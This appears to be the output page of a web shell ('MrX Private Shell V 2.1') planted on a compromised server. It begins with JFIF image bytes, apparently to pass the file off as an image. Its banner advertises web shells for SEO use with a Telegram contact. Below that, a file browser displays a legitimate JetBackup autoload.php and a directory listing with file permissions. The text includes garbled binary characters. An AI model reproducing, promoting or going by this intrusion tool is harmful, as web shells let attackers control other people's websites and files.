����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/*
*
* JetBackup @ package
* Created By Idan Ben-Ezra
*
* Copyrights @ JetApps
* https://www.jetapps.com
*
**/
defined( '__JETBACKUP__' ) or die( 'Restricted access' );
spl_autoload_register(function($className) {
$parts = explode('\\', $className);
if(!isset($parts[0]) || $parts[0] != 'Badcow') return false;
unset($parts[0]);
$path = dirname(__FILE__) . '/' . implode('/', $parts) . '.php';
if(!file_exists($path)) return false;
require_once($path);
return true;
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| DNS | Folder | 0755 |
|
|
| autoload.php | File | 489 B | 0644 |
|